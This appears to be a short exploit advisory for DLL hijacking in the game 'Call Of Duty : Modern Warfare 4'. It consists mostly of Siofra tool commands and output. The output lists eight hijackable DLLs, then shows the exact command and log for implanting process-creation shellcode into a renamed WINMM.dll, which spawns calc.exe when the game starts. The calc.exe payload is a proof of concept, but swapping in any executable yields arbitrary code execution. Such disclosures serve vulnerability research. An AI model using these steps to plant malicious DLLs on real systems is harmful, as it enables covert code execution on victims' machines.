+--------------------------------------------------------------------------------- | # Title : Call Of Duty : Modern Warfare 4 DLL Hijacking | # Author : Febriyanto Nugroho (vmvm1071@gmail.com) | # Tested on : Windows 7 Ultimate 64-bit (6.1, build 7601) | # Vendor Link : https://www.activision.com/ +--------------------------------------------------------------------------------- 1. Description =============== I found a bug that could allow piracy of DLL files in the game Call Of Duty : Modern Warfare 4, the attacker can inject by inserting a payload against DLL files that have vulnerabilities. C:\siofra>Siofra32.exe --mode file-scan -f "D:\MW4\iw3sp.exe" --enum-dependency --dll-hijack [*] Siofra version 1.13 has entered architecture mode Wow64 ======== D:\MW4\iw3sp.exe [32-bit PE] ======== iw3sp.exe WINMM.dll [!] msvcrt.dll [KnownDLL] API-MS-Win-Core-ErrorHandling-L1-1-0.dll [API set] kernel32.dll [KnownDLL] USER32.dll [KnownDLL] GDI32.dll [KnownDLL] LPK.dll [KnownDLL] USP10.dll [KnownDLL] ADVAPI32.dll [KnownDLL] RPCRT4.dll [KnownDLL] SspiCli.dll [Base] CRYPTBASE.dll [Base] mss32.dll [!] binkw32.dll [!] d3d9.dll [!] VERSION.dll [!] d3d8thk.dll [!] dwmapi.dll [!] d3dx9_34.dll [!] SHELL32.dll [KnownDLL] SHLWAPI.dll [KnownDLL] DDRAW.dll [!] DCIMAN32.dll [!] SETUPAPI.dll [KnownDLL] CFGMGR32.dll [Base] OLEAUT32.dll [KnownDLL] ole32.dll [KnownDLL] DEVOBJ.dll [Base] [!] Module WINMM.dll vulnerable at D:\MW4\WINMM.dll (real path: C:\Windows\SysWOW64\WINMM.dll) [!] Module d3d9.dll vulnerable at D:\MW4\d3d9.dll (real path: C:\Windows\SysWOW64\d3d9.dll) [!] Module VERSION.dll vulnerable at D:\MW4\VERSION.dll (real path: C:\Windows\SysWOW64\VERSION.dll) [!] Module d3d8thk.dll vulnerable at D:\MW4\d3d8thk.dll (real path: C:\Windows\SysWOW64\d3d8thk.dll) [!] Module dwmapi.dll vulnerable at D:\MW4\dwmapi.dll (real path: C:\Windows\SysWOW64\dwmapi.dll) [!] Module d3dx9_34.dll vulnerable at D:\MW4\d3dx9_34.dll (real path: C:\Windows\SysWOW64\d3dx9_34.dll) [!] Module DDRAW.dll vulnerable at D:\MW4\DDRAW.dll (real path: C:\Windows\SysWOW64\DDRAW.dll) [!] Module DCIMAN32.dll vulnerable at D:\MW4\DCIMAN32.dll (real path: C:\Windows\SysWOW64\DCIMAN32.dll) C:\siofra> The scan results above for the Call Of Duty: Modern Warfare 4 game application, there are several DLL files have vulnerability. 2. Exploiting =============== Exploitation can be done by saving the DLL file in the Call Of Duty: Modern Warfare 4 game folder, by copying the DLL file, rename the DLL file to <file_DLL_original.dll> <vuln_DLL.dll>. D:\>cd D:\MW4 D:\MW4>C:\siofra\Siofra32.exe --mode infect -f WINMM_original.dll -o WINMM.dll --payload-type process --payload-path C:\Windows\System32\calc.exe [*] Siofra version 1.13 has entered architecture mode Wow64 [*] Infection mode selected (verbosity level 1). [*] Successfully read target file WINMM_original.dll (194048 bytes) to memory [*] Selected process creation shellcode (1177 bytes) for implant [*] Allocated 1235 bytes for custom shellcode (including path C:\Windows\System32\calc.exe) [*] Successfully validated chosen PE with entry point 0x000037f1 [*] Entry point at 0x000037f1 tied to section ".text". Checking for relocs overlapping with detour of size 10 to be written to this address [*] The desired PE contains a valid reloc section at 0x0002f000. [*] This file has relocations but they do not interfere with the desired detour at 0x000037f1 (10 bytes) [*] New PE created File size: 194048 -> 195584 bytes Detour information Size: 10 RVA: 0x000037f1 Destination: 0x00031400 Checksum: 0x00035432 -> 0x00034915 Image size: 0x00032000 -> 0x00032000 Implanted section Name: .reloc (index 3) RVA: 0x0002f000 Virtual size: 8804 -> 10451 bytes Raw size: 9216 -> 10752 bytes Payload address: 0x00031400 Payload size: 1247 [+] Successfully completed appender infection on WINMM_original.dll [+] Wrote new PE to output file WINMM.dll D:\MW4> 4. Result ========== The results after the payload injection of the Call Of Duty: Modern Warfare 4 game file, when run then the game will do spawning calc.exe